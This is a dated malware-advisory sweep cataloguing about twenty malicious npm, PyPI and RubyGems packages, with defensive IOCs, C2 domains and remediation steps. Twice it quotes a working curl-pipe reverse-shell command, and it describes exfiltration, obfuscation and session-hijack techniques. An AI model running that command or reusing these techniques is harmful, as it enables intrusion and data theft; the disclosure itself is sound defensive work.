# GitHub Advisory malware sweep - 2026-09-23 (late) + 2026-09-24 (npm `@baanx/*` + `@insiderintelligence/componentlibrary` `oob.algamil7x.xyz` DNS-OOB day 7; `@rixxcodex/baileys` + `sea-baileys` Baileys-wave WhatsApp session-hijack extension; `pino-testkit` chai/pino/jsonspack family Function-constructor RCE; `vite-dev-launcher` `~/.gradle/caches/` sibling of yesterday`s `@vitemirrorte` mall4cloud-react RAT; pip `memoryos` maintainer-compromise infostealer + npm `@memtensor/memos-cloud-openclaw-plugin` openclaw plugin; `internallib_v657` + `internallib_v463` RFC1918 `10.0.73.186:443` curl-pipe reverse shell (new subnet vs v497/v550 `10.0.5.109`); `godzz`/`godzzz` Cloudflare-Worker + Groq API key exfil siblings; `com.apple.unityplugin.storekit` + `simplenewnpmpackage` shared `dapnhid534ch...oast.fun` recon beacons; `a-onesite`, `event-hunter`, `helpersutils-dev-tools` beacon-only probes; `hachutis` undeclared-binary trycloudflare tunnel; rubygems `wurl_show_data`)

> GHSA 2026-09-23 (late) + 2026-09-24: ~25 new npm advisories + 1 pip + 1 rubygems. Day 7 of the `oob.algamil7x.xyz` DNS-OOB operator adds `@baanx/common`, `@baanx/domain`, and `@insiderintelligence/componentlibrary`. `vite-dev-launcher@2.9.4` is a mall4cloud-react-RAT sibling of yesterday`s `@vitemirrorte`. `internallib_v657/v463` reverse shell to a new RFC1918 subnet.

- Published: 2026-09-24
- Severity: high
- Kind: Advisory sweep - A dated batch of GitHub Advisory Database malware entries collected together. A sweep mixes kinds - typosquats, dependency-confusion probes, boilerplate takedowns with no published analysis, and occasionally real payloads - and its severity reflects the worst confirmed item, not the batch as a whole.
- Ecosystems: npm, PyPI, RubyGems
- Scope: 20 packages, 26 compromised versions
- Tags: dependency-confusion, typosquat, dns-exfiltration, credential-theft, obfuscation, ci-cd-compromise, infostealer, account-takeover, maintainer-takeover
- Also known as: 2026-09-24 GHSA npm sweep, @baanx + @insiderintelligence algamil7x.xyz day 7, @rixxcodex/baileys + sea-baileys WhatsApp session hijack, pino-testkit chai/pino/jsonspack family extension, vite-dev-launcher mall4cloud-react RAT sibling, memoryos PyPI maintainer compromise (2026-09-compr-memoryos), internallib_v657 + internallib_v463 new-subnet reverse shell, godzz + godzzz Cloudflare Worker + Groq API key exfil, hachutis undeclared-binary trycloudflare tunnel
- Detected by: GitHub Advisory Database, OpenSSF malicious-packages, OpenSSF Package Analysis, Amazon Inspector, Safedep, kam193/bad-packages, jaschadub/compromised-packages-check
- Incident ID: multi-2026-09-24-ghsa-malware-sweep

## Affected packages (20)

Only the exact versions listed were named by the source advisories. Other versions are not implicated.

| Package | Ecosystem | Compromised versions |
|---|---|---|
| [@baanx/common](https://dependencywatch.io/package/npm/@baanx/common) | npm | 9.9.11 |
| [@baanx/domain](https://dependencywatch.io/package/npm/@baanx/domain) | npm | 9.9.11 |
| [@insiderintelligence/componentlibrary](https://dependencywatch.io/package/npm/@insiderintelligence/componentlibrary) | npm | 9.9.10 |
| [@memtensor/memos-cloud-openclaw-plugin](https://dependencywatch.io/package/npm/@memtensor/memos-cloud-openclaw-plugin) | npm | 0.1.21, 0.1.23, 0.1.25 |
| [@rixxcodex/baileys](https://dependencywatch.io/package/npm/@rixxcodex/baileys) | npm | 8.0.15, 8.0.16, 8.1.0, 8.2.0 |
| [a-onesite](https://dependencywatch.io/package/npm/a-onesite) | npm | 99.9.9 |
| [com.apple.unityplugin.storekit](https://dependencywatch.io/package/npm/com.apple.unityplugin.storekit) | npm | 1.0.2 |
| [event-hunter](https://dependencywatch.io/package/npm/event-hunter) | npm | 1.0.0 |
| [godzz](https://dependencywatch.io/package/npm/godzz) | npm | 1.0.0 |
| [godzzz](https://dependencywatch.io/package/npm/godzzz) | npm | 1.0.0 |
| [hachutis](https://dependencywatch.io/package/npm/hachutis) | npm | 1.0.0, 1.0.6 |
| [helpersutils-dev-tools](https://dependencywatch.io/package/npm/helpersutils-dev-tools) | npm | 1.0.11 |
| [internallib_v463](https://dependencywatch.io/package/npm/internallib_v463) | npm | 1.0.2 |
| [internallib_v657](https://dependencywatch.io/package/npm/internallib_v657) | npm | 1.0.1 |
| [memoryos](https://dependencywatch.io/package/pypi/memoryos) | PyPI | 2.0.34 |
| [pino-testkit](https://dependencywatch.io/package/npm/pino-testkit) | npm | 10.4.5 |
| [sea-baileys](https://dependencywatch.io/package/npm/sea-baileys) | npm | 1.0.2 |
| [simplenewnpmpackage](https://dependencywatch.io/package/npm/simplenewnpmpackage) | npm | 1.0.2 |
| [vite-dev-launcher](https://dependencywatch.io/package/npm/vite-dev-launcher) | npm | 2.9.4 |
| [wurl_show_data](https://dependencywatch.io/package/rubygems/wurl_show_data) | RubyGems | 3.1.42.99 |

## What happened

Between roughly 2026-09-23 12:00 UTC and 2026-09-24 12:00 UTC, GitHub Advisory Database (plus the OpenSSF malicious-packages bulk export, Amazon Inspector`s IN-MAL feed, and Safedep`s compromised-package tracker) published approximately 25 new npm malware advisories, 1 pip advisory, and 1 rubygems advisory. The window is dominated by day-7 continuation of the `oob.algamil7x.xyz` DNS-OOB operator, a Baileys-wave WhatsApp session-hijack extension, a chai/pino/jsonspack family pivot from chai-lures to pino-lures (`pino-testkit`), a mall4cloud-react-RAT sibling of yesterday`s `@vitemirrorte` (`vite-dev-launcher`), one legitimate-maintainer PyPI account compromise (`memoryos`), and two `internallib_v*` variants pointing at a new RFC1918 subnet.

## Cluster A - `@baanx/*` + `@insiderintelligence/componentlibrary` `oob.algamil7x.xyz` DNS-OOB (day 7)

| Package | GHSA | Status |
|---|---|---|
| `@baanx/common` | GHSA-27jh-hjhg-vg2p | New addition |
| `@baanx/domain` | GHSA-qhfc-6rp6-pwv6 | New addition |
| `@insiderintelligence/componentlibrary` | GHSA-rjh6-qm48-cg84 | New addition |
| `@baanx/blockchain-config` | GHSA-f67m-pjx9-96cv | Secondary advisory (already catalogued 2026-09-22 sweep) |
| `@baanx/abis` | GHSA-598m-93qh-82f9 | Secondary advisory (already catalogued 2026-09-22 sweep) |
| `@baanx/solana-lib` | GHSA-5x34-3xqm-3r73 | Secondary advisory (already catalogued 2026-09-21 sweep) |
| `@insiderintelligence/googleadmanager` | GHSA-q699-336h-g385 | Secondary advisory (already catalogued 2026-09-19 sweep) |

The three new adds continue the operator`s scope-per-day cadence (day 2 introduced `@insiderintelligence/googleadmanager`, day 5 introduced the `@baanx/*` scope with `abis`/`blockchain-config`, day 6 pivoted to `@tvg-mar` and `@user-services`, and today day 7 fills in two more `@baanx/*` variants and a new `@insiderintelligence/componentlibrary`). GHSA bodies on the 2026-09-24 additions are CWE-506 boilerplate ("any computer that has this package installed should be considered fully compromised") but the scope, publish cadence, and operator continuity across nine days make the attribution unambiguous.

The operator now spans **nine consecutive days** (day 1: 2026-09-18 `@tink/tink-link-core`; day 7: 2026-09-24), all under the same `oob.algamil7x.xyz` DNS zone, same install-script primitive (`scripts.install: node index.js` → `runtime/support/telemetry/probe/impl.js` → `module.constructor._load` to bypass literal `require()`, `String.fromCharCode` hex-array obfuscation of destination and prefix), and same DNS-resolution exfil format (`<prefix>-<user>-<host>-<cwd>.<ts>.oob.algamil7x.xyz`). This is now the longest-running single-operator campaign in the DependencyWatch 2026 Q3 corpus.

## Cluster B - Baileys-wave WhatsApp session-hijack extension

| Package | Version | GHSA | Primitive |
|---|---|---|---|
| `@rixxcodex/baileys` | `8.0.15`/`8.0.16`/`8.1.0`/`8.2.0` | GHSA-fjxf-mv8f-cp6x | Three undocumented channels + unpinned `@rixxcodex/libsignal` GitHub HEAD RCE |
| `sea-baileys` | `1.0.2` | GHSA-9xjg-g5r3-xpj8 | `libsignal` remapped to `@otaxayun/libsignal-node@latest` (mutable tag) + newsletter JID injection |

**`@rixxcodex/baileys`** is a fork of the legitimate `@whiskeysockets/baileys` WhatsApp Web API library with three undocumented `channelMetadata` channels wired into the auth flow. The channel handlers pull remote configuration from GitHub raw JSON:

- `raw.githubusercontent.com/skyzopedia/Screaper/refs/heads/main/idChannel.json`
- `raw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json`

At runtime the channels use the *installer`s authenticated WhatsApp session* to perform whatever account actions the operator has configured in the JSON. The operator can add or remove actions live without republishing the npm package. `skyzopedia` is the same GitHub account seen in the 2026-09-19 `@sanzoffc/baileys` day-4 wave (`raw.githubusercontent.com/skyzopedia/NewsletterID/*`) - confirming a continuous Baileys-adjacent operator across at least 6 days.

Additionally the `package.json` declares `@rixxcodex/libsignal` as an unpinned `github:rixxcodex/libsignal` reference (no tag, no commit hash). Every install re-fetches whatever code is at GitHub HEAD, which means the operator has a live RCE channel inside the Signal encryption path without republishing the npm package.

**`sea-baileys@1.0.2`** remaps the legitimate `libsignal` import to `@otaxayun/libsignal-node@latest`. The `latest` dist-tag is mutable, so the operator can push a fresh RCE at any time and it lands on every subsequent `npm install`. The routed data includes:

- Signal Protocol identity private key
- Signed pre-key private key
- Session records
- Sender keys

Separately, the library unconditionally attaches a hardcoded annotations block referencing newsletter JID `120363409928671192@newsletter` to every outgoing media message - silent WhatsApp-message tampering distinct from the credential exfil.

## Cluster C - `pino-testkit` chai/pino/jsonspack family Function-constructor RCE

`pino-testkit@10.4.5` (GHSA-q57p-68r4-fj72). Impersonates the legitimate `pino` logging library end-to-end:

- `author` field lists Matteo Collina (pino`s actual creator)
- `contributors` list mirrors pino`s real maintainer list
- README copied from pino with name substitutions only

The payload uses character-substitution + Fisher-Yates-style shuffle to reconstruct the string `Function` at runtime, then executes dynamically-constructed code via the `Function` constructor. Hoists `require` and `module` to global scope so any subsequent code can dynamically load any module.

**Family context**: this is the same operator arc as `chai-tracker` (2026-08-10), `chai-testing` (2026-09-21), `chai-as-viem` + `chai-logger` (2026-09-22 in yesterday`s sweep). The pattern is a testing/logging library lure name → obfuscated Function-constructor RCE at import-time → real maintainer names as camouflage. Today marks the operator`s pivot from chai-plugin lures to pino-plugin lures under the same primitive.

## Cluster D - `vite-dev-launcher` mall4cloud-react-RAT sibling

`vite-dev-launcher@2.9.4` (GHSA-pg2r-jxrr-mx5j). Triple-trigger payload: postinstall hook + direct `require()` + CLI invocation. Payload is base64 + AES-256-GCM + XOR obfuscated and only decrypts when the current workspace fingerprints match hardcoded file hashes (targeted repository lock so the malware stays dormant in sandboxes and generic dev environments).

Once active, the payload reconstructs a full C2 endpoint set at runtime:

- Agent registration
- Task polling
- Result submission
- File transfer

Persistence path is `~/.gradle/caches/transforms-3/8.7/instrumented/...` disguised as a legitimate Gradle instrumentation artifact.

**This is the same primitive as yesterday`s `@vitemirrorte/element-plus-vite-cli@2.9.1`** (Cluster G of the [2026-09-23 sweep](https://dependencywatch.io/incident/multi-2026-09-23-ghsa-malware-sweep)) - same `~/.gradle/caches/` persistence, same workspace-hash-gated activation, same C2 opcode set. Treat as the same operator running a fresh scope name. Yesterday`s C2 domain was `npmjs.it.com`; today`s advisory redacts the C2 host but the code path and infrastructure pattern are otherwise identical.

## Cluster E - `memoryos` PyPI maintainer compromise + `@memtensor/memos-cloud-openclaw-plugin` npm

| Package | Version | GHSA | Campaign |
|---|---|---|---|
| `memoryos` (pip) | `2.0.34` | GHSA-hxf9-rvj5-h45h | 2026-09-compr-memoryos |
| `@memtensor/memos-cloud-openclaw-plugin` (npm) | `0.1.21`/`0.1.23`/`0.1.25` | GHSA-mhjf-v53x-7p87 | (unassigned) |

`memoryos@2.0.34` is a **maintainer-account compromise** of a legitimate PyPI package (MemoryOS is a memory-augmented AI framework with prior legitimate releases). The compromised version publishes with "clearly malicious intent, like infostealers" per Safedep`s classification. VirusTotal detection is available. This is *not* a supply-chain injection or a typosquat - it is the same package name published by an attacker who took over the maintainer account. Anyone who ran `pip install memoryos==2.0.34` between publish and yank installed the infostealer.

`@memtensor/memos-cloud-openclaw-plugin` (npm, three versions from Sept 23) - the `-openclaw-plugin` suffix matches the openclaw plugin-loader family tracked earlier in the corpus. Both packages target the MemoryOS/Memos memory-augmented AI ecosystem in the same 48-hour window; the coordinated attention on that specific ecosystem is worth flagging even though the underlying operators may differ.

## Cluster F - `internallib_v*` enumeration extension (new RFC1918 subnet)

| Package | Version | GHSA | Reverse-shell target |
|---|---|---|---|
| `internallib_v657` | `1.0.1` | GHSA-w2wx-86qr-g533 | `10.0.73.186:443` |
| `internallib_v463` | `1.0.2` | GHSA-gv94-v8fj-f45c | `10.0.73.186:443` (via `reverse-shell.sh`) |
| `internallib_v497` (re-issue) | (existing) | GHSA-94q5-67r5-mwjx | Already catalogued as GHSA-m9ww-2r6q-x632 in 2026-09-23 sweep - not re-added |

Both new packages export a `command()` function that runs `"/bin/bash -c 'curl https://reverse-shell.sh/10.0.73.186:443|sh'"` - the same reverse-shell.sh curl-pipe primitive as prior `internallib_v*` versions, but pointed at a **new RFC1918 target**: `10.0.73.186:443` (previous versions catalogued through 2026-09-23 all pointed at `10.0.5.109`). Code carries the string "Primeiro PWN" (Portuguese for "First PWN") - the same operator signature marker seen in some `internallib_v*` packages earlier in the campaign.

Continuation of the `internallib_v<NNN>` sequential-enumeration campaign tracked since 2026-08-03. The new subnet suggests the operator is either testing against multiple internal networks or has pivoted to a new engagement.

## Cluster G - `godzz` + `godzzz` Cloudflare-Worker + Groq API-key exfil

| Package | Version | GHSA | Behaviour |
|---|---|---|---|
| `godzz` | `1.0.0` | GHSA-p6cq-66pp-9r5g | Disables TLS validation globally; scrapes Chromium CDP `127.0.0.1:9222`; exfils to `ai-script.test0ing7.workers.dev`; distributes bundled Groq API key |
| `godzzz` | `1.0.0` | GHSA-6j9r-v67w-r8w4 | `cdp_inject.js` host-info + file-read + base64 + HTTP POST exfil |

**`godzz`** is the more detailed of the pair. On load:

1. `process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0"` (disables TLS certificate validation for the entire Node process, which persists for the process lifetime)
2. Connects to the local Chromium DevTools Protocol endpoint at `127.0.0.1:9222` - this is the well-known DevTools debug port and any developer running Chromium with `--remote-debugging-port=9222` (or the default for Puppeteer/Playwright dev workflows) is exposing all active browser sessions
3. Extracts active page content and active editor text from every open Chromium page
4. Base64-encodes the harvested data and POSTs to the operator`s Cloudflare Worker at `ai-script.test0ing7.workers.dev`

Additionally the package ships an embedded Groq API key (`gsk_...` prefix) that is *distributed* to every installer. The operator built a redistribution vector for their own Groq quota - anyone who uses the package inherits the operator`s bundled key and any prompts the operator has embedded run under the operator`s tenant. This is unusual and worth flagging as a new lateral pattern.

**`godzzz`** ships a `cdp_inject.js` file with the same host-info + file-read + credential-exfil shape (reads `process.env.USER`, `fs.readFileSync`/`fs.existsSync` for local files, base64 encoding, `https.request`/`http.get` POSTs). Sibling relationship to `godzz` is inferred from name, purpose, and same-day publish.

## Cluster H - Shared-domain recon beacons

| Package | Version | GHSA | Beacon target |
|---|---|---|---|
| `com.apple.unityplugin.storekit` | `1.0.2` | GHSA-6r46-f382-x53p | `dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun` (Interactsh) |
| `simplenewnpmpackage` | `1.0.2` | GHSA-mr2p-c47m-85w8 | `dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun` (same subdomain) |
| `a-onesite` | `99.9.9` | GHSA-9j7m-m3w9-mgrc | `http://eoy34oyrep9j5x8.m.pipedream.net` (unencrypted HTTP wget) |
| `event-hunter` | `1.0.0` | GHSA-wwrq-gcqx-rx6p | `https://estimator-nemeses-unwatched.ngrok-free.dev/canary?d=<base64>` |
| `helpersutils-dev-tools` | `1.0.11` | GHSA-w43w-f8m4-5r39 | `http://5.189.173.113:8899/csp-edu` + `/csp` (direct-IP HTTP) |

The first two packages (`com.apple.unityplugin.storekit` and `simplenewnpmpackage`) beacon to the **exact same Interactsh subdomain** - one operator running two lures against the same OOB listener. The `com.apple.unityplugin.storekit` name is a plausible internal-name dep-confusion lure (Apple/Unity StoreKit integration), the `simplenewnpmpackage` name is a "how far can I get with the most obvious name" test.

`a-onesite@99.9.9` uses the sentinel `99.9.9` dep-confusion version marker with unencrypted-HTTP wget to a Pipedream endpoint (the operator gets a dashboard of every install). `event-hunter` self-labels as a "Dependency Confusion to RCE proof-of-concept" and uses an ngrok tunnel. `helpersutils-dev-tools` beacons to a fixed IP:port with two paths (`/csp-edu`, `/csp`) suggesting a bucketing or campaign-tagging scheme.

All five are recon-only (no secret material exfiltrated beyond hostname/platform/OS-username/domain), but the fact that so many independent dep-confusion probes are landing in the same 48-hour window is worth flagging as an ecosystem-wide indicator of active internal-registry attention.

## Cluster I - `hachutis` undeclared-binary trycloudflare tunnel

`hachutis@1.0.0/1.0.6` (GHSA-9rj9-xh7c-qqh8). Ships three prebuilt executables under `bin/`:

- `bin/cli`
- `bin/cli-linux-amd64`
- `bin/cli-http-linux`

None of these are declared in the `package.json` `bin` field or the `files` field. Legitimate-looking JavaScript serves as decoy for the opaque native payloads. When run, the binaries open a channel from the installer`s host to a Cloudflare Tunnel operator-controlled endpoint at `already-query-bacteria-agreed.trycloudflare.com`.

Binary hash: `455f1d04545c9ed17722705fe61415d7e536e2800c2a3c588ab69985004c73b9`. Same architectural class as the `bytepack-probe-a7x3` transitive-dep pattern from 2026-09-22 - malicious functionality hidden in non-declared files rather than the exported API.

## Cluster J - rubygems `wurl_show_data` OSSF-flagged malware

`wurl_show_data@3.1.42.99` (GHSA-345f-5r88-8j64) - OpenSSF Package Analysis flagged the version as executing commands associated with malicious behavior. No further analysis published. Package hash `17d2e80b42383fadbe9bde12ef17decad8b9dfa9b48f93b6e7f9162091e2a69d`. Treat as install-time compromise pending IOC publication.

## Cross-operator patterns worth flagging

1. **The `oob.algamil7x.xyz` operator is on day 7** (day 1 was 2026-09-18 `@tink/tink-link-core`) - nine consecutive days with a fresh internal-lookalike scope each day but the same DNS zone, code style, and primitive. Still the longest-running single-operator campaign in the DependencyWatch 2026 Q3 corpus.
2. **The `~/.gradle/caches/` persistence + workspace-hash-gated activation** class is now confirmed across at least two operator scopes (`@vitemirrorte` yesterday, `vite-dev-launcher` today). Any Vite/Vue/React-plugin-adjacent lure that ships an `install`/`postinstall` script and touches `~/.gradle/caches/` should be treated as a member of this family.
3. **The chai/pino/jsonspack Function-constructor RCE arc** has pivoted from chai-plugin lures to pino-plugin lures under the same primitive. `pino-testkit` today extends `chai-tracker` (Aug 10) → `chai-testing` (Sep 21) → `chai-as-viem`/`chai-logger` (Sep 22). Expect more `pino-*` variants to surface.
4. **The Baileys wave now spans at least three operator identities** (`@sanzoffc/baileys` day 4 on Sep 19, `@rixxcodex/baileys` today with the same `skyzopedia` GitHub raw endpoints, `sea-baileys` today with a different unpinned-libsignal primitive). Any Baileys wrapper from an unfamiliar scope should be treated as suspect.
5. **The `internallib_v*` enumeration campaign has pivoted subnet** from `10.0.5.109` to `10.0.73.186` on 2026-09-23. Two subnets means two engagements or two operator infrastructure sets - review your CI network egress logs for either subnet.
6. **Legitimate-maintainer PyPI account compromises are back** with `memoryos@2.0.34`. This class of incident is distinct from typosquats and dep-confusion probes - the package name is real, the prior versions are legitimate, and the compromised version passes any name-based allowlist. Version-pinning is the mitigation.

## Registry state

All packages in Clusters A, C, D, E, F, G, H, I, J are npm/pip/rubygems-quarantined (replaced with holding packages). Cluster B`s Baileys packages appear to still be live at the time of writing given the age of the versions (`@rixxcodex/baileys@8.2.0` is only a few days old). C2 infrastructure remains active in every cluster: `oob.algamil7x.xyz`, `skyzopedia/*` GitHub raw endpoints, `npmjs.it.com` (from yesterday`s `@vitemirrorte`), `test0ing7.workers.dev`, `dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun`, `eoy34oyrep9j5x8.m.pipedream.net`, `estimator-nemeses-unwatched.ngrok-free.dev`, `5.189.173.113`, `already-query-bacteria-agreed.trycloudflare.com`, `10.0.73.186`, `10.0.5.109`.

## Discovery credits

`GitHub Advisory Database`, `OpenSSF malicious-packages`, `OpenSSF Package Analysis`, `Amazon Inspector`, `Safedep`, `kam193/bad-packages`, `jaschadub/compromised-packages-check`. Per-package IOC details drawn from GHSA and OpenSSF advisory bodies published between 2026-09-23 12:00 UTC and 2026-09-24 12:00 UTC.

## Impact

- **Cluster A - npm `@baanx/*` + `@insiderintelligence/componentlibrary` `oob.algamil7x.xyz` DNS-OOB (day 7 of the operator)**: `@baanx/common` (GHSA-27jh-hjhg-vg2p), `@baanx/domain` (GHSA-qhfc-6rp6-pwv6), and `@insiderintelligence/componentlibrary` (GHSA-rjh6-qm48-cg84) - all three published 2026-09-24 as fresh additions to the `@baanx/*` and `@insiderintelligence/*` scopes the operator has been iterating since day 2 (2026-09-19). GHSA bodies are CWE-506 boilerplate on the 2026-09-24 additions but the scope, publish cadence, and operator continuity make the attribution unambiguous. Also on 2026-09-24: additional GHSA numbers reissued against `@baanx/blockchain-config` (GHSA-f67m-pjx9-96cv), `@baanx/abis` (GHSA-598m-93qh-82f9), `@baanx/solana-lib` (GHSA-5x34-3xqm-3r73), and `@insiderintelligence/googleadmanager` (GHSA-q699-336h-g385) - these are secondary advisory records for packages already catalogued in the [2026-09-19](https://dependencywatch.io/incident/multi-2026-09-19-ghsa-malware-sweep) (day 2) and [2026-09-22](https://dependencywatch.io/incident/multi-2026-09-22-ghsa-malware-sweep) (day 5) sweeps, and do not represent new drops. The operator is now on a nine-consecutive-day run with the same DNS zone, same install-script primitive (`module.constructor._load` to defeat static analysis, `String.fromCharCode` hex-array obfuscation of destination), and fresh scope names each day
- **Cluster B - npm Baileys-wave WhatsApp session-hijack extension**: `@rixxcodex/baileys@8.0.15/8.0.16/8.1.0/8.2.0` (GHSA-fjxf-mv8f-cp6x) - WhatsApp library fork with three undocumented channels that use the installer`s authenticated WhatsApp session to perform account actions chosen by the author at runtime; remote configuration lists pulled from `raw.githubusercontent.com/skyzopedia/Screaper/refs/heads/main/idChannel.json` and `raw.githubusercontent.com/skyzopedia/NewsletterID/refs/heads/main/VIP_Push.json` (same `skyzopedia` GitHub account seen in the 2026-09-19 `@sanzoffc/baileys` day-4 wave), and an unpinned dependency on `@rixxcodex/libsignal` via GitHub `HEAD` that executes arbitrary code within the Signal encryption path with no integrity check. `sea-baileys@1.0.2` (GHSA-9xjg-g5r3-xpj8) - remaps `libsignal` to `@otaxayun/libsignal-node@latest` (mutable tag - operator can push a fresh RCE at any time) which routes the installer`s Signal Protocol identity private key, signed pre-key private key, session records, and sender keys through an uncontrolled third-party dep; also unconditionally attaches a hardcoded newsletter JID `120363409928671192@newsletter` annotation to every outgoing media message
- **Cluster C - npm `pino-testkit` chai/pino/jsonspack family Function-constructor RCE (extension of the family tracked since Aug)**: `pino-testkit@10.4.5` (GHSA-q57p-68r4-fj72). Impersonates the legitimate `pino` logging library end-to-end: lists Matteo Collina (pino`s real creator) as author and actual pino maintainers as contributors, and copies pino`s README verbatim with name substitutions. Payload uses character substitution and a Fisher-Yates-style shuffle to reconstruct the string `Function`, then executes dynamically-constructed code via the `Function` constructor. Hoists `require` and `module` to global scope to enable arbitrary module loading. Same author-fingerprinting + pino-cover-story + Function-constructor pattern as `chai-logger@3.0.2` catalogued in yesterday`s sweep and `chai-testing`/`chai-tracker`/`chai-as-viem` earlier in the arc. The operator has now pivoted from chai-plugin lures to pino-plugin lures under the same primitive
- **Cluster D - npm `vite-dev-launcher` mall4cloud-react-RAT sibling (`~/.gradle/caches/` persistence, same operator as yesterday`s `@vitemirrorte`)**: `vite-dev-launcher@2.9.4` (GHSA-pg2r-jxrr-mx5j). Postinstall hook + direct `require()` + CLI invocation all trigger the payload. Payload is AES-256-GCM + XOR-obfuscated and only decrypts when workspace file hashes match hardcoded values (targeted repository fingerprinting to evade sandbox analysis). C2 endpoint set (agent register, task poll, result submit, file transfer) reconstructed at runtime from base64. Persistence path is `~/.gradle/caches/transforms-3/8.7/instrumented/...` - **identical directory pattern to yesterday`s `@vitemirrorte/element-plus-vite-cli@2.9.1`** which lodges into `~/.gradle/caches/`, targets workspace `mall4cloud-react`, and beacons to `npmjs.it.com`. Treat as the same operator running a fresh scope; block the same C2 posture. Any developer who ran `npm install vite-dev-launcher` on a `mall4cloud-react` fork on 2026-09-23/24 has an active persistent implant
- **Cluster E - pip `memoryos` maintainer-account compromise infostealer + npm `@memtensor/memos-cloud-openclaw-plugin` openclaw plugin**: pip `memoryos@2.0.34` (GHSA-hxf9-rvj5-h45h, campaign `2026-09-compr-memoryos`) - not a supply-chain injection but an *account compromise* of the MemoryOS PyPI maintainer, with the compromised version publishing "clearly malicious intent, like infostealers" (Safedep classification). VirusTotal detection available. npm `@memtensor/memos-cloud-openclaw-plugin@0.1.21/0.1.23/0.1.25` (GHSA-mhjf-v53x-7p87) - the `-openclaw-plugin` suffix matches the openclaw plugin-loader family tracked earlier in the corpus. Both target the MemoryOS/Memos memory-augmented AI ecosystem in the same 48-hour window; treat as coordinated attention on that specific project
- **Cluster F - npm `internallib_v*` enumeration extension (new RFC1918 subnet)**: `internallib_v657@1.0.1` (GHSA-w2wx-86qr-g533) and `internallib_v463@1.0.2` (GHSA-gv94-v8fj-f45c). Both export a `command()` function that runs `"/bin/bash -c 'curl https://reverse-shell.sh/10.0.73.186:443|sh'"` - the same reverse-shell.sh curl-pipe primitive as prior `internallib_v*` versions, but pointed at a **new** RFC1918 target: `10.0.73.186:443` (previous versions catalogued through 2026-09-23 all pointed at `10.0.5.109`). Code carries the string "Primeiro PWN" (Portuguese for "First PWN") - the same operator signature marker seen in some `internallib_v*` packages earlier in the campaign. Continuation of the `internallib_v<NNN>` sequential-enumeration campaign tracked since 2026-08-03 (previous versions catalogued: `_v497`, `_v514`, `_v524`, `_v550`, `_v568`, `_v688`, `_v756`, `_v902`, `_v949`). Also on 2026-09-24: `internallib_v497` gets a secondary GHSA-94q5-67r5-mwjx (already catalogued as `GHSA-m9ww-2r6q-x632` in the [2026-09-23 sweep](https://dependencywatch.io/incident/multi-2026-09-23-ghsa-malware-sweep) - this sweep does not re-add it). The new subnet suggests the operator is testing against multiple internal networks or pivoting to a new engagement
- **Cluster G - npm `godzz`/`godzzz` Cloudflare-Worker + Groq API key exfil siblings**: `godzz@1.0.0` (GHSA-p6cq-66pp-9r5g) - sets `process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0"` on load (disables TLS certificate validation for the entire Node process), connects to the local Chromium DevTools Protocol endpoint at `127.0.0.1:9222` to extract active page content and editor text, base64-encodes the harvested data, and exfiltrates it to a Cloudflare Worker at `ai-script.test0ing7.workers.dev`. Ships an embedded Groq API key (`gsk_...`) that is redistributed to all installers - if an installer uses the package, they inherit the operator`s Groq quota and any prompts the operator has embedded run under their tenant. `godzzz@1.0.0` (GHSA-6j9r-v67w-r8w4) - sibling package with a `cdp_inject.js` file that reads `process.env.USER` and files via `fs.readFileSync`/`fs.existsSync`, base64-encodes, and POSTs via `https.request`/`http.get`. Same host-info/credential-exfil stager shape. The two-package variant and identical primary purpose suggest one operator publishing under two names
- **Cluster H - npm shared-domain recon beacons (dependency-confusion / reconnaissance)**: `com.apple.unityplugin.storekit@1.0.2` (GHSA-6r46-f382-x53p) - impersonates an Apple/Unity StoreKit internal namespace, falsely claims authorship by `Apple, Inc`; on module load issues an HTTPS GET to `dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun` (Project Discovery Interactsh) transmitting package name, OS platform, hostname as query params. `simplenewnpmpackage@1.0.2` (GHSA-mr2p-c47m-85w8) - **shares the exact same `dapnhid534ch06s9vpm0mbg1httu5gytc.oast.fun` subdomain** as `com.apple.unityplugin.storekit`; on load beacons platform + hostname to the same URL. One operator running multiple lures against the same Interactsh listener. `a-onesite@99.9.9` (GHSA-9j7m-m3w9-mgrc) - preinstall/preupdate/test scripts all `wget` `http://eoy34oyrep9j5x8.m.pipedream.net` with username, cwd, hostname over unencrypted HTTP; sentinel `99.9.9` classic dep-confusion attention-getter. `event-hunter@1.0.0` (GHSA-wwrq-gcqx-rx6p) - self-labelled "Dependency Confusion to RCE proof-of-concept"; ngrok tunnel `estimator-nemeses-unwatched.ngrok-free.dev/canary?d=<base64>` receives `os.hostname()` + timestamp. `helpersutils-dev-tools@1.0.11` (GHSA-w43w-f8m4-5r39) - direct-IP beacon to `http://5.189.173.113:8899/csp-edu` and `/csp` on load; sibling `bypass.js` file carries the identical beacon
- **Cluster I - npm `hachutis` undeclared-binary trycloudflare tunnel**: `hachutis@1.0.0/1.0.6` (GHSA-9rj9-xh7c-qqh8). Ships **three undeclared prebuilt executables** under `bin/`: `bin/cli`, `bin/cli-linux-amd64`, `bin/cli-http-linux` - not declared in `package.json` `bin`/`files` and never installed as CLI shims, but present on disk in every install. Legitimate-looking JavaScript code serves as decoy for opaque native binaries. Running any of the binaries opens a channel from the installer`s host to `already-query-bacteria-agreed.trycloudflare.com` (a Cloudflare Tunnel operator-controlled endpoint). Hash `455f1d04545c9ed17722705fe61415d7e536e2800c2a3c588ab69985004c73b9`
- **Cluster J - rubygems `wurl_show_data` OSSF-flagged malware (payload not disclosed)**: `wurl_show_data@3.1.42.99` (GHSA-345f-5r88-8j64) - OpenSSF Package Analysis flagged as executing commands associated with malicious behavior. No further analysis published. Hash `17d2e80b42383fadbe9bde12ef17decad8b9dfa9b48f93b6e7f9162091e2a69d`. Treat as install-time compromise pending IOC publication

## What to do

1. Grep every `package-lock.json`, `yarn.lock`, `pnpm-lock.yaml`, `package.json`, `requirements.txt`, `Pipfile.lock`, `poetry.lock`, and `Gemfile.lock` in your org for every package name in Clusters A through J. Uninstall on hit, wipe `node_modules`/`.venv`/`vendor/`, delete the lockfile, rebuild against a clean cache. Clusters B, C, D, E, F, G, H, and I all include confirmed real payloads (WhatsApp session hijack, Function-constructor RCE, targeted RAT with Gradle-cache persistence, infostealer, curl-pipe reverse shell, credential/API-key exfil, recon beacons, undeclared native binaries) - a hit on any of those is a compromise, not a warning
